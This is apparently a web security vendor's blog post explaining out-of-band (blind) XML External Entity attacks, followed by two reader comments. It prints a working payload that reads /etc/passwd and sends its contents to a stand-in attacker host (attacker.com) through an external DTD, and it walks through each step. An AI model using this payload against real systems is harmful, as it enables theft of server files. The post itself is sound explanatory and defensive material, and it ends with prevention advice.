Out-of-band XML External Entity (OOB-XXE)

As with many types of attacks, you can divide XML External Entity attacks (XXE attacks) into two types: in-band and out-of-band. In-band XXE attacks are more common and let the attacker receive an immediate response to the XXE payload. In the case of out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application. To learn about in-band XXE vulnerabilities and attacks, read the following article: What Are XML External Entity (XXE) Attacks.

The process for exploiting out-of-band XXE vulnerabilities is similar to using parameter entities with in-band XXE and involves the creation of an external DTD (Document Type Definition). There is one major difference: with this type of attack, the attacker needs the XML parser to make an additional request to an attacker-controlled server. This is needed to read the contents of the local file.

The following is an example of how an attacker could leverage parameter entities to steal sensitive data using an out-of-band (OOB) technique.

Request Attacker DTD (attacker.com/evil.dtd)
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM
  "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM
  "http://attacker.com/evil.dtd">
  %dtd;
]>
<data>&send;</data>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?collect=%file;'>">
%all;
 





 

The attack is conducted as follows:

  1. The XML parser first processes the %file parameter entity, which loads the file /etc/passwd.
  2. Next, the XML parser makes a request to the attacker’s DTD file at http://attack.example.com/evil.dtd.
  3. After the XML parser processes the attacker’s DTD file, the %all parameter entity creates a general entity called &send, which contains a URL. This URL includes the file contents (e.g. http://attacker.com/collect.php?collect=root:!:0:0::/:/usr/bin/ksh…).
  4. Finally, after the URL is constructed, the XML parser processes the &send entity, which makes a request to the attacker’s server.
  5. The attacker can log the request on their end and reconstruct the file from the log entry.

Conclusion

XML External Entity (XXE) vulnerabilities, both in-band and out-of-band, are very serious and affect almost any web application that parses XML documents. They are the number 4 threat in the OWASP Top 10 2017 list. XXE can be used to cause a denial of service as well as steal system files and source code from local servers. Attackers can also use XXE to launch Server Side Request Forgery (SSRF) attacks upon other servers on the internal network.

Fortunately, it’s easy to test if your website or web application is vulnerable to XXE and other vulnerabilities by running an automated web scan using the Acunetix vulnerability scanner, which includes a specialized XXE scanner module. Take a demo and find out more about running XXE scans against your website or web application.

The easiest way to avoid all types of XXE is to disable DTDs (Document Type Definitions). If you cannot do it, check the XXE Prevention Cheat Sheet by OWASP.

Share this post
Ian Muscat

Acunetix developers and tech agents regularly contribute to the blog. All the Acunetix developers come with years of experience in the web security sphere.
  • “The easiest way to avoid all types of XXE is to disable DTDs (Document Type Definitions). If you cannot do it, check the **XSS Prevention Cheat Sheet by OWASP**.”

    I may be wrong but I guess this is a typo and should be “..XXE Prevention Cheat Sheet by OWASP” ?

  • You mention “&xxe” in steps 3 and 4, but the code snippet reflects that it should be “&send”

    Thanks for this writeup, I was struggling with a DTD I was working on that didn’t use the entity expansion/creation in step 3 and I’m still not sure why that’s necessary.

  • Leave a Reply

    Your email address will not be published.